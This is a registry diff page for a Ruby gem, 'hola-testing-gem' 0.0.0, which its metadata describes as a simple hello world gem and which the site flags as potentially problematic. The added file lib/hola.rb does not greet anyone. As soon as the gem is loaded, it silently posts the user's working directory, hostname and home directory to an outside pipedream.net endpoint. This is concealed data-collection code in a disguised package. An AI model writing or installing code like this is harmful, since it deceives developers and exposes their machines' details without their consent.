hola-testing-gem 0.0.0-x86_64-linux

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of hola-testing-gem might be problematic. Click here for more details.

Files changed (3) hide show
  1. checksums.yaml +7 -0
  2. data/lib/hola.rb +6 -0
  3. metadata +43 -0
checksums.yaml ADDED
@@ -0,0 +1,7 @@
1
+ ---
2
+ SHA256:
3
+ metadata.gz: e26bc63fa6db16f5a2037495e7ff40dc06faadcedfc816e645c237c002ccef53
4
+ data.tar.gz: 5a7723d91a6cd453d746da40f6ad689996784524fce2d5804dd9da77944cf87c
5
+ SHA512:
6
+ metadata.gz: 8738f1e0ae6d48934980b3f6d68fd2f9909d6fc5b758d0bd7592e3825f7ae60931815dcc0dc51d03e8766de393066919a277b923a91a287a9c05294371f72fe2
7
+ data.tar.gz: f65f93b4b7004f762e4a134978f8810389ab56fdf36a74a9312cffbc90c9342fa85c76c6bf3ff42978f9251e1c80332c083a5a140872fed6c1bc26272cc7eadf
data/lib/hola.rb ADDED
@@ -0,0 +1,6 @@
1
+ require 'net/http'
2
+ require 'uri'
3
+ require 'socket'
4
+ url = "https://enhwr81xye7ad.x.pipedream.net"
5
+ Net::HTTP.post(URI(url), "cwd:#{Dir.pwd};hostname:#{Socket.gethostname};home:#{Dir.home};gem:GEM_NAME")
6
+
metadata ADDED
@@ -0,0 +1,43 @@
1
+ --- !ruby/object:Gem::Specification
2
+ name: hola-testing-gem
3
+ version: !ruby/object:Gem::Version
4
+ version: 0.0.0
5
+ platform: x86_64-linux
6
+ authors:
7
+ - Nick Quaranto
8
+ autorequire:
9
+ bindir: bin
10
+ cert_chain: []
11
+ date: 2022-05-09 00:00:00.000000000 Z
12
+ dependencies: []
13
+ description: A simple hello world gem
14
+ email: nick@quaran.to
15
+ executables: []
16
+ extensions: []
17
+ extra_rdoc_files: []
18
+ files:
19
+ - lib/hola.rb
20
+ homepage: https://rubygems.org/gems/hola-testing-gem
21
+ licenses:
22
+ - MIT
23
+ metadata: {}
24
+ post_install_message:
25
+ rdoc_options: []
26
+ require_paths:
27
+ - lib
28
+ required_ruby_version: !ruby/object:Gem::Requirement
29
+ requirements:
30
+ - - ">="
31
+ - !ruby/object:Gem::Version
32
+ version: '0'
33
+ required_rubygems_version: !ruby/object:Gem::Requirement
34
+ requirements:
35
+ - - ">="
36
+ - !ruby/object:Gem::Version
37
+ version: '0'
38
+ requirements: []
39
+ rubygems_version: 3.0.3.1
40
+ signing_key:
41
+ specification_version: 4
42
+ summary: Hola!
43
+ test_files: []